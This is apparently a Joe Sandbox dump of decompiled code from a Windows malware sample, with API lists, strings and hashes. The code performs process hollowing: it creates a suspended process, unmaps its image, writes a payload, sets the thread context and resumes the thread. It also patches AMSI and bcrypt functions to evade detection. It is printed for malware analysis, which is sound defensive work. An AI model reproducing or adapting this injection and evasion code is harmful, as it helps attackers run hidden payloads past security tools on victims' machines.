                    						E03264698( &_v256, E03264964(_v260));
                    						_push(_v256);
                    						E032647B0( &_v268,  *0x329e35c, 0x3279f4c);
                    						E03264698( &_v264, E03264964(_v268));
                    						_pop(_t1726);
                    						E03277C04(_v264,  *0x329e35c, _t1726, _t2004);
                    						_push(0x3279f4c);
                    						_push( *0x329e35c);
                    						_push("Initialize");
                    						E03264824();
                    						E03264698( &_v272, E03264964(_v276));
                    						_push(_v272);
                    						E032647B0( &_v284,  *0x329e35c, 0x3279f4c);
                    						E03264698( &_v280, E03264964(_v284));
                    						_pop(_t1731);
                    						E03277C04(_v280,  *0x329e35c, _t1731, _t2004);
                    						_push(0x3279f4c);
                    						_push( *0x329e35c);
                    						_push("ScanString");
                    						E03264824();
                    						E03264698( &_v288, E03264964(_v292));
                    						_push(_v288);
                    						E032647B0( &_v300,  *0x329e35c, 0x3279f4c);
                    						E03264698( &_v296, E03264964(_v300));
                    						_pop(_t1736);
                    						E03277C04(_v296,  *0x329e35c, _t1736, _t2004);
                    						_t819 =  *0x329e388; // 0x0
                    						_t820 = GetThreadContext(_t819, 0x329e3d8);
                    						_t2005 = _t820;
                    						if(_t820 != 0) {
                    							_push(0x3279f4c);
                    							_push( *0x329e35c);
                    							_push("UacInitialize");
                    							E03264824();
                    							E03264698( &_v304, E03264964(_v308));
                    							_push(_v304);
                    							E032647B0( &_v316,  *0x329e35c, 0x3279f4c);
                    							E03264698( &_v312, E03264964(_v316));
                    							_pop(_t1741);
                    							E03277C04(_v312,  *0x329e35c, _t1741, _t2005);
                    							_push(0x3279f4c);
                    							_push( *0x329e35c);
                    							_push("UacScan");
                    							E03264824();
                    							E03264698( &_v320, E03264964(_v324));
                    							_push(_v320);
                    							E032647B0( &_v332,  *0x329e35c, 0x3279f4c);
                    							E03264698( &_v328, E03264964(_v332));
                    							_pop(_t1746);
                    							E03277C04(_v328,  *0x329e35c, _t1746, _t2005);
                    							_push(0x3279f4c);
                    							_push( *0x329e35c);
                    							_push("Initialize");
                    							E03264824();
                    							E03264698( &_v336, E03264964(_v340));
                    							_push(_v336);
                    							E032647B0( &_v348,  *0x329e35c, 0x3279f4c);
                    							E03264698( &_v344, E03264964(_v348));
                    							_pop(_t1751);
                    							E03277C04(_v344,  *0x329e35c, _t1751, _t2005);
                    							_push(0x3279f4c);
                    							_push( *0x329e35c);
                    							_push("ScanString");
                    							E03264824();
                    							E03264698( &_v352, E03264964(_v356));
                    							_push(_v352);
                    							E032647B0( &_v364,  *0x329e35c, 0x3279f4c);
                    							E03264698( &_v360, E03264964(_v364));
                    							_pop(_t1756);
                    							E03277C04(_v360,  *0x329e35c, _t1756, _t2005);
                    							_t877 =  *0x329e47c; // 0x0
                    							_t879 =  *0x329e384; // 0x0
                    							NtReadVirtualMemory(_t879, _t877 + 8, 0x329e4ac, 4, 0x329e4b4);
                    							_t881 =  *0x329e4a8; // 0x0
                    							_t2006 =  *((intOrPtr*)(_t881 + 0x34)) -  *0x329e4ac; // 0x0
                    							if(_t2006 != 0) {
                    								_t883 =  *0x329e4c0; // 0x0
                    								_t884 =  *0x329e4a8; // 0x0
                    								_t886 =  *0x329e384; // 0x0
                    								 *0x329e4b0 = E032779BC(_t886,  *((intOrPtr*)(_t884 + 0x34)), _t883, 0x3000, 0x40);
                    							} else {
                    								_push(0x3279f4c);
                    								_push( *0x329e35c);
                    								_push("UacInitialize");
                    								E03264824();
                    								E03264698( &_v368, E03264964(_v372));
                    								_push(_v368);
                    								E032647B0( &_v380,  *0x329e35c, 0x3279f4c);
                    								E03264698( &_v376, E03264964(_v380));
                    								_pop(_t1969);
                    								E03277C04(_v376,  *0x329e35c, _t1969, _t2006);
                    								_push(0x3279f4c);
                    								_push( *0x329e35c);
                    								_push("UacScan");
                    								E03264824();
                    								E03264698( &_v384, E03264964(_v388));
                    								_push(_v384);
                    								E032647B0( &_v396,  *0x329e35c, 0x3279f4c);
                    								E03264698( &_v392, E03264964(_v396));
                    								_pop(_t1974);
                    								E03277C04(_v392,  *0x329e35c, _t1974, _t2006);
                    								_push(0x3279f4c);
                    								_push( *0x329e35c);
                    								_push("Initialize");
                    								E03264824();
                    								E03264698( &_v400, E03264964(_v404));
                    								_push(_v400);
                    								E032647B0( &_v412,  *0x329e35c, 0x3279f4c);
                    								E03264698( &_v408, E03264964(_v412));
                    								_pop(_t1979);
                    								E03277C04(_v408,  *0x329e35c, _t1979, _t2006);
                    								_push(0x3279f4c);
                    								_push( *0x329e35c);
                    								_push("ScanString");
                    								E03264824();
                    								E03264698( &_v416, E03264964(_v420));
                    								_push(_v416);
                    								E032647B0( &_v428,  *0x329e35c, 0x3279f4c);
                    								E03264698( &_v424, E03264964(_v428));
                    								_pop(_t1984);
                    								E03277C04(_v424,  *0x329e35c, _t1984, _t2006);
                    								_t1535 =  *0x329e4a8; // 0x0
                    								_t1537 =  *0x329e384; // 0x0
                    								if(NtUnmapViewOfSection(_t1537,  *(_t1535 + 0x34)) != 0) {
                    									_t1539 =  *0x329e4c0; // 0x0
                    									_t1540 =  *0x329e384; // 0x0
                    									 *0x329e4b0 = E032779BC(_t1540, 0, _t1539, 0x3000, 0x40);
                    								} else {
                    									_t1542 =  *0x329e4c0; // 0x0
                    									_t1543 =  *0x329e384; // 0x0
                    									 *0x329e4b0 = E032779BC(_t1543, 0, _t1542, 0x3000, 0x40);
                    								}
                    							}
                    							_t2008 =  *0x329e4b0;
                    							if( *0x329e4b0 != 0) {
                    								_push(0x3279f4c);
                    								_push( *0x329e35c);
                    								_push("UacInitialize");
                    								E03264824();
                    								E03264698( &_v432, E03264964(_v436));
                    								_push(_v432);
                    								E032647B0( &_v444,  *0x329e35c, 0x3279f4c);
                    								E03264698( &_v440, E03264964(_v444));
                    								_pop(_t1761);
                    								E03277C04(_v440,  *0x329e35c, _t1761, _t2008);
                    								_push(0x3279f4c);
                    								_push( *0x329e35c);
                    								_push("UacScan");
                    								E03264824();
                    								E03264698( &_v448, E03264964(_v452));
                    								_push(_v448);
                    								E032647B0( &_v460,  *0x329e35c, 0x3279f4c);
                    								E03264698( &_v456, E03264964(_v460));
                    								_pop(_t1766);
                    								E03277C04(_v456,  *0x329e35c, _t1766, _t2008);
                    								_push(0x3279f4c);
                    								_push( *0x329e35c);
                    								_push("Initialize");
                    								E03264824();
                    								E03264698( &_v464, E03264964(_v468));
                    								_push(_v464);
                    								E032647B0( &_v476,  *0x329e35c, 0x3279f4c);
                    								E03264698( &_v472, E03264964(_v476));
                    								_pop(_t1771);
                    								E03277C04(_v472,  *0x329e35c, _t1771, _t2008);
                    								_push(0x3279f4c);
                    								_push( *0x329e35c);
                    								_push("ScanString");
                    								E03264824();
                    								E03264698( &_v480, E03264964(_v484));
                    								_push(_v480);
                    								E032647B0( &_v492,  *0x329e35c, 0x3279f4c);
                    								E03264698( &_v488, E03264964(_v492));
                    								_pop(_t1776);
                    								E03277C04(_v488,  *0x329e35c, _t1776, _t2008);
                    								_t1995 = E03277E64(_t1994, _t2013);
                    								_t946 =  *0x329e4a8; // 0x0
                    								_t2009 =  *((intOrPtr*)(_t946 + 0x34)) -  *0x329e4b0; // 0x0
                    								if(_t2009 != 0) {
                    									_push(0x3279f4c);
                    									_push( *0x329e35c);
                    									_push("UacInitialize");
                    									E03264824();
                    									E03264698( &_v496, E03264964(_v500));
                    									_push(_v496);
                    									E032647B0( &_v508,  *0x329e35c, 0x3279f4c);
                    									E03264698( &_v504, E03264964(_v508));
                    									_pop(_t1914);
                    									E03277C04(_v504,  *0x329e35c, _t1914, _t2009);
                    									_push(0x3279f4c);
                    									_push( *0x329e35c);
                    									_push("UacScan");
                    									E03264824();
                    									E03264698( &_v512, E03264964(_v516));
                    									_push(_v512);
                    									E032647B0( &_v524,  *0x329e35c, 0x3279f4c);
                    									E03264698( &_v520, E03264964(_v524));
                    									_pop(_t1919);
                    									E03277C04(_v520,  *0x329e35c, _t1919, _t2009);
                    									_push(0x3279f4c);
                    									_push( *0x329e35c);
                    									_push("Initialize");
                    									E03264824();
                    									E03264698( &_v528, E03264964(_v532));
                    									_push(_v528);
                    									E032647B0( &_v540,  *0x329e35c, 0x3279f4c);
                    									E03264698( &_v536, E03264964(_v540));
                    									_pop(_t1924);
                    									E03277C04(_v536,  *0x329e35c, _t1924, _t2009);
                    									_push(0x3279f4c);
                    									_push( *0x329e35c);
                    									_push("ScanString");
                    									E03264824();
                    									E03264698( &_v544, E03264964(_v548));
                    									_push(_v544);
                    									E032647B0( &_v556,  *0x329e35c, 0x3279f4c);
                    									E03264698( &_v552, E03264964(_v556));
                    									_pop(_t1929);
                    									E03277C04(_v552,  *0x329e35c, _t1929, _t2009);
                    									_t1386 =  *0x329e4a8; // 0x0
                    									_t1930 =  *0x329e4b0; // 0x0
                    									_t1387 =  *0x329e4a8; // 0x0
                    									E03277D5C(_t2013, _t1995, _t1387, _t1930 -  *((intOrPtr*)(_t1386 + 0x34)));
                    									_t1389 =  *0x329e4a8; // 0x0
                    									_t1932 =  *0x329e4b0; // 0x0
                    									 *(_t1389 + 0x34) = _t1932;
                    									_push(0x3279f4c);
                    									_push( *0x329e35c);
                    									_push("UacInitialize");
                    									E03264824();
                    									E03264698( &_v560, E03264964(_v564));
                    									_push(_v560);
                    									E032647B0( &_v572,  *0x329e35c, 0x3279f4c);
                    									E03264698( &_v568, E03264964(_v572));
                    									_pop(_t1937);
                    									E03277C04(_v568,  *0x329e35c, _t1937, _t2009);
                    									_push(0x3279f4c);
                    									_push( *0x329e35c);
                    									_push("OpenSession");
                    									E03264824();
                    									E03264698( &_v576, E03264964(_v580));
                    									_push(_v576);
                    									E032647B0( &_v588,  *0x329e35c, 0x3279f4c);
                    									E03264698( &_v584, E03264964(_v588));
                    									_pop(_t1942);
                    									E03277C04(_v584,  *0x329e35c, _t1942, _t2009);
                    									_push(0x3279f4c);
                    									_push( *0x329e35c);
                    									_push("ScanBuffer");
                    									E03264824();
                    									E03264698( &_v592, E03264964(_v596));
                    									_push(_v592);
                    									E032647B0( &_v604,  *0x329e35c, 0x3279f4c);
                    									E03264698( &_v600, E03264964(_v604));
                    									_pop(_t1947);
                    									E03277C04(_v600,  *0x329e35c, _t1947, _t2009);
                    									_push(0);
                    									_push(_t1995);
                    									_t1433 =  *0x329e4a4; // 0x0
                    									asm("cdq");
                    									_t2010 =  *((intOrPtr*)(_t1433 + 0x3c)) + _v456;
                    									asm("adc edx, [esp+0x4]");
                    									_t1949 =  *0x329e4a8; // 0x0
                    									E03277D50( *((intOrPtr*)(_t1433 + 0x3c)) + _v456, 0xf8, _t1949);
                    									_push(0x3279f4c);
                    									_push( *0x329e35c);
                    									_push("ScanBuffer");
                    									E03264824();
                    									E03264698( &_v608, E03264964(_v612));
                    									_push(_v608);
                    									E032647B0( &_v620,  *0x329e35c, 0x3279f4c);
                    									E03264698( &_v616, E03264964(_v620));
                    									_pop(_t1954);
                    									E03277C04(_v616,  *0x329e35c, _t1954,  *((intOrPtr*)(_t1433 + 0x3c)) + _v456);
                    									_push(0x3279f4c);
                    									_push( *0x329e35c);
                    									_push("UacInitialize");
                    									E03264824();
                    									E03264698( &_v624, E03264964(_v628));
                    									_push(_v624);
                    									E032647B0( &_v636,  *0x329e35c, 0x3279f4c);
                    									E03264698( &_v632, E03264964(_v636));
                    									_pop(_t1959);
                    									E03277C04(_v632,  *0x329e35c, _t1959,  *((intOrPtr*)(_t1433 + 0x3c)) + _v456);
                    									_push(0x3279f4c);
                    									_push( *0x329e35c);
                    									_push("OpenSession");
                    									E03264824();
                    									E03264698( &_v640, E03264964(_v644));
                    									_push(_v640);
                    									E032647B0( &_v652,  *0x329e35c, 0x3279f4c);
                    									E03264698( &_v648, E03264964(_v652));
                    									_pop(_t1964);
                    									E03277C04(_v648,  *0x329e35c, _t1964,  *((intOrPtr*)(_t1433 + 0x3c)) + _v456);
                    								}
                    								_push(0x3279f4c);
                    								_push( *0x329e35c);
                    								_push("ScanString");
                    								E03264824();
                    								E03264698( &_v656, E03264964(_v660));
                    								_push(_v656);
                    								E032647B0( &_v668,  *0x329e35c, 0x3279f4c);
                    								E03264698( &_v664, E03264964(_v668));
                    								_pop(_t1781);
                    								E03277C04(_v664,  *0x329e35c, _t1781, _t2010);
                    								_t962 =  *0x329e4c0; // 0x0
                    								_t963 =  *0x329e4b0; // 0x0
                    								_t964 =  *0x329e384; // 0x0
                    								NtWriteVirtualMemory(_t964, _t963, _t1995, _t962, 0x329e4b4);
                    								_push(0x3279f4c);
                    								_push( *0x329e35c);
                    								_push("UacInitialize");
                    								E03264824();
                    								E03264698( &_v672, E03264964(_v676));
                    								_push(_v672);
                    								E032647B0( &_v684,  *0x329e35c, 0x3279f4c);
                    								E03264698( &_v680, E03264964(_v684));
                    								_pop(_t1786);
                    								E03277C04(_v680,  *0x329e35c, _t1786, _t2010);
                    								_push(0x3279f4c);
                    								_push( *0x329e35c);
                    								_push("ScanString");
                    								E03264824();
                    								E03264698( &_v688, E03264964(_v692));
                    								_push(_v688);
                    								E032647B0( &_v700,  *0x329e35c, 0x3279f4c);
                    								E03264698( &_v696, E03264964(_v700));
                    								_pop(_t1791);
                    								E03277C04(_v696,  *0x329e35c, _t1791, _t2010);
                    								_push(0x3279f4c);
                    								_push( *0x329e35c);
                    								_push("OpenSession");
                    								E03264824();
                    								E03264698( &_v704, E03264964(_v708));
                    								_push(_v704);
                    								E032647B0( &_v716,  *0x329e35c, 0x3279f4c);
                    								E03264698( &_v712, E03264964(_v716));
                    								_pop(_t1796);
                    								E03277C04(_v712,  *0x329e35c, _t1796, _t2010);
                    								_push(0x3279f4c);
                    								_push( *0x329e35c);
                    								_push("UacInitialize");
                    								E03264824();
                    								E03264698( &_v720, E03264964(_v724));
                    								_push(_v720);
                    								E032647B0( &_v732,  *0x329e35c, 0x3279f4c);
                    								E03264698( &_v728, E03264964(_v732));
                    								_pop(_t1801);
                    								E03277C04(_v728,  *0x329e35c, _t1801, _t2010);
                    								_push(0x3279f4c);
                    								_push( *0x329e35c);
                    								_push("ScanBuffer");
                    								E03264824();
                    								E03264698( &_v736, E03264964(_v740));
                    								_push(_v736);
                    								E032647B0( &_v748,  *0x329e35c, 0x3279f4c);
                    								E03264698( &_v744, E03264964(_v748));
                    								_pop(_t1806);
                    								E03277C04(_v744,  *0x329e35c, _t1806, _t2010);
                    								_t1036 =  *0x329e47c; // 0x0
                    								_t1038 =  *0x329e384; // 0x0
                    								NtWriteVirtualMemory(_t1038, _t1036 + 8, 0x329e4b0, 4, 0x329e4b4);
                    								_push(0x3279f4c);
                    								_push( *0x329e35c);
                    								_push("UacInitialize");
                    								E03264824();
                    								E03264698( &_v752, E03264964(_v756));
                    								_push(_v752);
                    								E032647B0( &_v764,  *0x329e35c, 0x3279f4c);
                    								E03264698( &_v760, E03264964(_v764));
                    								_pop(_t1811);
                    								E03277C04(_v760,  *0x329e35c, _t1811, _t2010);
                    								_push(0x3279f4c);
                    								_push( *0x329e35c);
                    								_push("ScanString");
                    								E03264824();
                    								E03264698( &_v768, E03264964(_v772));
                    								_push(_v768);
                    								E032647B0( &_v780,  *0x329e35c, 0x3279f4c);
                    								E03264698( &_v776, E03264964(_v780));
                    								_pop(_t1816);
                    								E03277C04(_v776,  *0x329e35c, _t1816, _t2010);
                    								_push(0x3279f4c);
                    								_push( *0x329e35c);
                    								_push("OpenSession");
                    								E03264824();
                    								E03264698( &_v784, E03264964(_v788));
                    								_push(_v784);
                    								E032647B0( &_v796,  *0x329e35c, 0x3279f4c);
                    								E03264698( &_v792, E03264964(_v796));
                    								_pop(_t1821);
                    								E03277C04(_v792,  *0x329e35c, _t1821, _t2010);
                    								_push(0x3279f4c);
                    								_push( *0x329e35c);
                    								_push("UacInitialize");
                    								E03264824();
                    								E03264698( &_v800, E03264964(_v804));
                    								_push(_v800);
                    								E032647B0( &_v812,  *0x329e35c, 0x3279f4c);
                    								E03264698( &_v808, E03264964(_v812));
                    								_pop(_t1826);
                    								E03277C04(_v808,  *0x329e35c, _t1826, _t2010);
                    								_push(0x3279f4c);
                    								_push( *0x329e35c);
                    								_push("ScanBuffer");
                    								E03264824();
                    								E03264698( &_v816, E03264964(_v820));
                    								_push(_v816);
                    								E032647B0( &_v828,  *0x329e35c, 0x3279f4c);
                    								E03264698( &_v824, E03264964(_v828));
                    								_pop(_t1831);
                    								E03277C04(_v824,  *0x329e35c, _t1831, _t2010);
                    								_t1110 =  *0x329e4a8; // 0x0
                    								_t1112 =  *((intOrPtr*)(_t1110 + 0x28)) +  *0x329e4b0;
                    								_t2011 = _t1112;
                    								 *0x329e488 = _t1112;
                    								_push(0x3279f4c);
                    								_push( *0x329e35c);
                    								_push("UacInitialize");
                    								E03264824();
                    								E03264698( &_v832, E03264964(_v836));
                    								_push(_v832);
                    								E032647B0( &_v844,  *0x329e35c, 0x3279f4c);
                    								E03264698( &_v840, E03264964(_v844));
                    								_pop(_t1836);
                    								E03277C04(_v840,  *0x329e35c, _t1836, _t1112);
                    								_push(0x3279f4c);
                    								_push( *0x329e35c);
                    								_push("UacInitialize");
                    								E03264824();
                    								E03264698( &_v848, E03264964(_v852));
                    								_push(_v848);
                    								E032647B0( &_v860,  *0x329e35c, 0x3279f4c);
                    								E03264698( &_v856, E03264964(_v860));
                    								_pop(_t1841);
                    								E03277C04(_v856,  *0x329e35c, _t1841, _t1112);
                    								_push(0x3279f4c);
                    								_push( *0x329e35c);
                    								_push("ScanBuffer");
                    								E03264824();
                    								E03264698( &_v864, E03264964(_v868));
                    								_push(_v864);
                    								E032647B0( &_v876,  *0x329e35c, 0x3279f4c);
                    								E03264698( &_v872, E03264964(_v876));
                    								_pop(_t1846);
                    								E03277C04(_v872,  *0x329e35c, _t1846, _t1112);
                    								_push(0x3279f4c);
                    								_push( *0x329e35c);
                    								_push("OpenSession");
                    								E03264824();
                    								E03264698( &_v880, E03264964(_v884));
                    								_push(_v880);
                    								E032647B0( &_v892,  *0x329e35c, 0x3279f4c);
                    								E03264698( &_v888, E03264964(_v892));
                    								_pop(_t1851);
                    								E03277C04(_v888,  *0x329e35c, _t1851, _t2011);
                    								_t1169 =  *0x329e388; // 0x0
                    								SetThreadContext(_t1169, 0x329e3d8);
                    								_push(0x3279f4c);
                    								_push( *0x329e35c);
                    								_push("OpenSession");
                    								E03264824();
                    								E03264698( &_v896, E03264964(_v900));
                    								_push(_v896);
                    								E032647B0( &_v908,  *0x329e35c, 0x3279f4c);
                    								E03264698( &_v904, E03264964(_v908));
                    								_pop(_t1856);
                    								E03277C04(_v904,  *0x329e35c, _t1856, _t2011);
                    								_push(0x3279f4c);
                    								_push( *0x329e35c);
                    								_push("ScanBuffer");
                    								E03264824();
                    								E03264698( &_v912, E03264964(_v916));
                    								_push(_v912);
                    								E032647B0( &_v924,  *0x329e35c, 0x3279f4c);
                    								E03264698( &_v920, E03264964(_v924));
                    								_pop(_t1861);
                    								E03277C04(_v920,  *0x329e35c, _t1861, _t2011);
                    								_t1199 =  *0x329e388; // 0x0
                    								NtResumeThread(_t1199, 0);
                    								_push(0x3279f4c);
                    								_push( *0x329e35c);
                    								_push("ScanString");
                    								E03264824();
                    								E03264698( &_v928, E03264964(_v932));
                    								_push(_v928);
                    								E032647B0( &_v940,  *0x329e35c, 0x3279f4c);
                    								E03264698( &_v936, E03264964(_v940));
                    								_pop(_t1866);
                    								E03277C04(_v936,  *0x329e35c, _t1866, _t2011);
                    								_push(0x3279f4c);
                    								_push( *0x329e35c);
                    								_push("OpenSession");
                    								E03264824();
                    								E03264698( &_v944, E03264964(_v948));
                    								_push(_v944);
                    								E032647B0( &_v956,  *0x329e35c, 0x3279f4c);
                    								E03264698( &_v952, E03264964(_v956));
                    								_pop(_t1871);
                    								E03277C04(_v952,  *0x329e35c, _t1871, _t2011);
                    								E03262C2C(_t1995);
                    								_push(0x3279f4c);
                    								_push( *0x329e35c);
                    								_push("OpenSession");
                    								E03264824();
                    								E03264698( &_v960, E03264964(_v964));
                    								_push(_v960);
                    								E032647B0( &_v972,  *0x329e35c, 0x3279f4c);
                    								E03264698( &_v968, E03264964(_v972));
                    								_pop(_t1877);
                    								E03277C04(_v968,  *0x329e35c, _t1877, _t2011);
                    								_push(0x3279f4c);
                    								_push( *0x329e35c);
                    								_push("ScanBuffer");
                    								E03264824();
                    								E03264698( &_v976, E03264964(_v980));
                    								_push(_v976);
                    								E032647B0( &_v988,  *0x329e35c, 0x3279f4c);
                    								E03264698( &_v984, E03264964(_v988));
                    								_pop(_t1882);
                    								E03277C04(_v984,  *0x329e35c, _t1882, _t2011);
                    								_push(0x3279f4c);
                    								_push( *0x329e35c);
                    								_push("OpenSession");
                    								E03264824();
                    								E03264698( &_v992, E03264964(_v996));
                    								_push(_v992);
                    								E032647B0( &_v1004,  *0x329e35c, 0x3279f4c);
                    								E03264698( &_v1000, E03264964(_v1004));
                    								_pop(_t1887);
                    								E03277C04(_v1000,  *0x329e35c, _t1887, _t2011);
                    								_push(0x3279f4c);
                    								_push( *0x329e35c);
                    								_push("ScanString");
                    								E03264824();
                    								E03264698( &_v1008, E03264964(_v1012));
                    								_push(_v1008);
                    								E032647B0( &_v1020,  *0x329e35c, 0x3279f4c);
                    								E03264698( &_v1016, E03264964(_v1020));
                    								_pop(_t1892);
                    								E03277C04(_v1016,  *0x329e35c, _t1892, _t2011);
                    								_t1288 =  *0x329e384; // 0x0
                    								E03277B14(_t1288, "BCryptVerifySignature");
                    								_t1290 =  *0x329e384; // 0x0
                    								E03277B14(_t1290, "BCryptQueryProviderRegistration");
                    								_t1292 =  *0x329e384; // 0x0
                    								E03277B14(_t1292, "BCryptRegisterProvider");
                    								_t1294 =  *0x329e384; // 0x0
                    								E03277B14(_t1294, "NtReadVirtualMemory");
                    								_t1296 =  *0x329e384; // 0x0
                    								E03277B14(_t1296, "NtOpenObjectAuditAlarm");
                    								_t1298 =  *0x329e384; // 0x0
                    								E03277B14(_t1298, "I_QueryTagInformation");
                    								_t1300 =  *0x329e384; // 0x0
                    								E03277B14(_t1300, "NtSetSecurityObject");
                    								_push(0x3279f4c);
                    								_push( *0x329e35c);
                    								_push("ScanBuffer");
                    								E03264824();
                    								E03264698( &_v1024, E03264964(_v1028));
                    								_push(_v1024);
                    								E032647B0( &_v1036,  *0x329e35c, 0x3279f4c);
                    								E03264698( &_v1032, E03264964(_v1036));
                    								_pop(_t1904);
                    								E03277C04(_v1032,  *0x329e35c, _t1904, _t2011);
                    								_push(0x3279f4c);
                    								_push( *0x329e35c);
                    								_push("OpenSession");
                    								E03264824();
                    								E03264698( &_v1040, E03264964(_v1044));
                    								_push(_v1040);
                    								E032647B0( &_v1052,  *0x329e35c, 0x3279f4c);
                    								E03264698( &_v1048, E03264964(_v1052));
                    								_pop(_t1909);
                    								E03277C04(_v1048,  *0x329e35c, _t1909, _t2011);
                    							}
                    						}
                    					}
                    				}
                    				_pop(_t1661);
                    				 *[fs:eax] = _t1661;
                    				_push(0x3279f2c);
                    				E032644C4( &_v1052, 0x64);
                    				E032644C4( &_v652, 0x64);
                    				E032644C4( &_v252, 0x18);
                    				E03264C24( &_v156);
                    				return E032644C4( &_v152, 0x25);
                    			}

                    APIs
                      • Part of subcall function 03277C04: LoadLibraryExA.KERNEL32(00000000,00000000,00000000,00000000,03277CA2), ref: 03277C3C
                      • Part of subcall function 03277C04: GetModuleHandleA.KERNEL32(00000000,00000000,00000000,00000000,00000000,03277CA2), ref: 03277C4A
                      • Part of subcall function 03277C04: GetProcAddress.KERNEL32(73990000,00000000), ref: 03277C63
                      • Part of subcall function 03277C04: FreeLibrary.KERNEL32(73990000,73990000,00000000,00000000,00000000,00000000,00000000,00000000,03277CA2), ref: 03277C82
                    • CreateProcessAsUserW.ADVAPI32(00000000,00000000,00000000,00000000,00000000,00000000,00000004,00000000,00000000,0329E394,0329E384,OpenSession,0329E35C,03279F4C,ScanString,0329E35C), ref: 0327837C
                    • GetThreadContext.KERNEL32(00000000,0329E3D8,ScanString,0329E35C,03279F4C,Initialize,0329E35C,03279F4C,UacScan,0329E35C,03279F4C,UacInitialize,0329E35C,03279F4C,ScanString,0329E35C), ref: 032787C2
                    • NtReadVirtualMemory.C:\WINDOWS\SYSTEM32\NTDLL(00000000,-00000008,0329E4AC,00000004,0329E4B4,ScanString,0329E35C,03279F4C,Initialize,0329E35C,03279F4C,UacScan,0329E35C,03279F4C,UacInitialize,0329E35C), ref: 032789AE
                    • NtUnmapViewOfSection.C:\WINDOWS\SYSTEM32\NTDLL(00000000,?,ScanString,0329E35C,03279F4C,Initialize,0329E35C,03279F4C,UacScan,0329E35C,03279F4C,UacInitialize,0329E35C,03279F4C,00000000,-00000008), ref: 03278B9A
                      • Part of subcall function 032779BC: GetModuleHandleW.KERNEL32(C:\Windows\System32\ntdll.dll,NtAllocateVirtualMemory), ref: 032779C9
                      • Part of subcall function 032779BC: GetProcAddress.KERNEL32(00000000,C:\Windows\System32\ntdll.dll), ref: 032779CF
                    • NtWriteVirtualMemory.C:\WINDOWS\SYSTEM32\NTDLL(00000000,00000000,00000000,00000000,0329E4B4,ScanString,0329E35C,03279F4C,ScanString,0329E35C,03279F4C,Initialize,0329E35C,03279F4C,UacScan,0329E35C), ref: 0327933E
                    • NtWriteVirtualMemory.C:\WINDOWS\SYSTEM32\NTDLL(00000000,-00000008,0329E4B0,00000004,0329E4B4,ScanBuffer,0329E35C,03279F4C,UacInitialize,0329E35C,03279F4C,OpenSession,0329E35C,03279F4C,ScanString,0329E35C), ref: 03279593
                    • SetThreadContext.KERNEL32(00000000,0329E3D8,OpenSession,0329E35C,03279F4C,ScanBuffer,0329E35C,03279F4C,UacInitialize,0329E35C,03279F4C,UacInitialize,0329E35C,03279F4C,ScanBuffer,0329E35C), ref: 032799AF
                    • NtResumeThread.C:\WINDOWS\SYSTEM32\NTDLL(00000000,00000000,ScanBuffer,0329E35C,03279F4C,OpenSession,0329E35C,03279F4C,00000000,0329E3D8,OpenSession,0329E35C,03279F4C,ScanBuffer,0329E35C,03279F4C), ref: 03279A9E
                      • Part of subcall function 03277B14: LoadLibraryW.KERNEL32(bcrypt,03279F4C,Initialize,0329E35C,03279F4C,UacScan,0329E35C,03279F4C,UacInitialize,0329E35C,03279F4C,00000000,0329E3D8,ScanString,0329E35C,03279F4C), ref: 03277B26
                      • Part of subcall function 03277B14: GetProcAddress.KERNEL32(00000000,BCryptVerifySignature), ref: 03277B33
                      • Part of subcall function 03277B14: NtWriteVirtualMemory.C:\WINDOWS\SYSTEM32\NTDLL(00000000,00000000,?,00000001,?,00000000,BCryptVerifySignature,bcrypt,03279F4C,Initialize,0329E35C,03279F4C,UacScan,0329E35C,03279F4C,UacInitialize), ref: 03277B4A
                      • Part of subcall function 03277B14: FreeLibrary.KERNEL32(00000000,00000000,BCryptVerifySignature,bcrypt,03279F4C,Initialize,0329E35C,03279F4C,UacScan,0329E35C,03279F4C,UacInitialize,0329E35C,03279F4C,00000000,0329E3D8), ref: 03277B59
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.761893695.0000000003261000.00000020.00001000.00020000.00000000.sdmp, Offset: 03260000, based on PE: true
                    • Associated: 00000000.00000002.761886979.0000000003260000.00000002.00001000.00020000.00000000.sdmp
                    • Associated: 00000000.00000002.761941452.0000000003289000.00000004.00001000.00020000.00000000.sdmp
                    • Associated: 00000000.00000002.761941452.0000000003393000.00000004.00001000.00020000.00000000.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_3260000_r096teIe1H.jbxd
                    Similarity
                    • API ID: LibraryMemoryVirtual$AddressProcThreadWrite$ContextFreeHandleLoadModule$CreateProcessReadResumeSectionUnmapUserView
                    • String ID: BCryptQueryProviderRegistration$BCryptRegisterProvider$BCryptVerifySignature$I_QueryTagInformation$Initialize$NtOpenObjectAuditAlarm$NtReadVirtualMemory$NtSetSecurityObject$OpenSession$ScanBuffer$ScanString$UacInitialize$UacScan$advapi32$bcrypt$ntdll
                    • API String ID: 108663649-1058128293
                    • Opcode ID: c45ce273cef75e65b9414b109f0c07d9ff231b1030d9d54f0445a728a65793da
                    • Instruction ID: 6af196b6d041dd6759f0cb70d38c121f5e91e7397dba01be97ca7810b6aa7694
                    • Opcode Fuzzy Hash: c45ce273cef75e65b9414b109f0c07d9ff231b1030d9d54f0445a728a65793da
                    • Instruction Fuzzy Hash: A903FB39A213589FDB11FB65DC90ADE73B9BF45600F1091E2A048AF224DBB09EC6CF51
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 83%
                    			E032658CC(CHAR* __eax, int __edx) {
                    				CHAR* _v8;
                    				int _v12;
                    				CHAR* _v16;
                    				void* _v20;
                    				struct _WIN32_FIND_DATAA _v338;
                    				char _v599;
                    				void* _t102;
                    				intOrPtr* _t103;
                    				CHAR* _t106;
                    				CHAR* _t108;
                    				char* _t109;
                    				void* _t110;
                    
                    				_v12 = __edx;
                    				_v8 = __eax;
                    				_v16 = _v8;
                    				_v20 = GetModuleHandleA("kernel32.dll");
                    				if(_v20 == 0) {
                    					L4:
                    					if( *_v8 != 0x5c) {
                    						_t108 =  &(_v8[2]);
                    						goto L10;
                    					} else {
                    						if(_v8[1] == 0x5c) {
                    							_t109 = E032658AC( &(_v8[2]));
                    							if( *_t109 != 0) {
                    								_t17 = _t109 + 1; // 0x1
                    								_t108 = E032658AC(_t17);
                    								if( *_t108 != 0) {
                    									L10:
                    									_t102 = _t108 - _v8;
                    									lstrcpynA( &_v599, _v8, _t102 + 1);
                    									while( *_t108 != 0) {
                    										_t106 = E032658AC( &(_t108[1]));
                    										if(_t106 - _t108 + _t102 + 1 <= 0x105) {
                    											lstrcpynA( &(( &_v599)[_t102]), _t108, _t106 - _t108 + 1);
